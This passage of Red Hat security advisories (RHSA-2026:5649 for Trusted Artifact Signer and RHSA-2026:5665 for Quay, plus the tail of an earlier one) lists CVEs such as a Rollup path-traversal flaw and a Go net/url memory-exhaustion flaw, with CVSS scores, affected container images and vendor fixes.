"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
}
]
}
RHSA-2026:5649
Vulnerability from csaf_redhat - Published: 2026-03-24 16:17 - Updated: 2026-03-26 15:39Summary
Red Hat Security Advisory: RHTAS 1.3.2 - Red Hat Trusted Artifact Signer Release
Severity
Important
Notes
Topic: The 1.3.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.
For more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
Details: The RHTAS Operator can be used with OpenShift Container Platform 4.16, 4.17, 4.18, 4.19 and 4.20
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev
Platform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization's software supply chain.
For details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
You can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index
https://access.redhat.com/errata/RHSA-2026:5649
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev
Platform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization's software supply chain.
For details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
You can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index
https://access.redhat.com/errata/RHSA-2026:5649
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.3.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.\nFor more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"title": "Topic"
},
{
"category": "general",
"text": "The RHTAS Operator can be used with OpenShift Container Platform 4.16, 4.17, 4.18, 4.19 and 4.20",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5649",
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5649.json"
}
],
"title": "Red Hat Security Advisory: RHTAS 1.3.2 - Red Hat Trusted Artifact Signer Release",
"tracking": {
"current_release_date": "2026-03-26T15:39:25+00:00",
"generator": {
"date": "2026-03-26T15:39:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.4"
}
},
"id": "RHSA-2026:5649",
"initial_release_date": "2026-03-24T16:17:51+00:00",
"revision_history": [
{
"date": "2026-03-24T16:17:51+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T16:18:03+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-26T15:39:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Trusted Artifact Signer 1.3",
"product": {
"name": "Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:trusted_artifact_signer:1.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Trusted Artifact Signer"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-rhel9@sha256%3A7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1774254230"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-ui-rhel9@sha256%3Ad23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1773934794"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T16:17:51+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T16:17:51+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
}
]
}
RHSA-2026:5665
Vulnerability from csaf_redhat - Published: 2026-03-24 18:02 - Updated: 2026-03-26 15:39Summary
Red Hat Security Advisory: Red Hat Quay 3.10.19
Severity
Important
Notes
Topic: Red Hat Quay 3.10.19 is now available with bug fixes.
Details: Quay 3.10.19
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.
During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.
7.4 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
7.3 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
7.4 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
6.5 (Medium)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
7.5 (High)
Vendor Fix
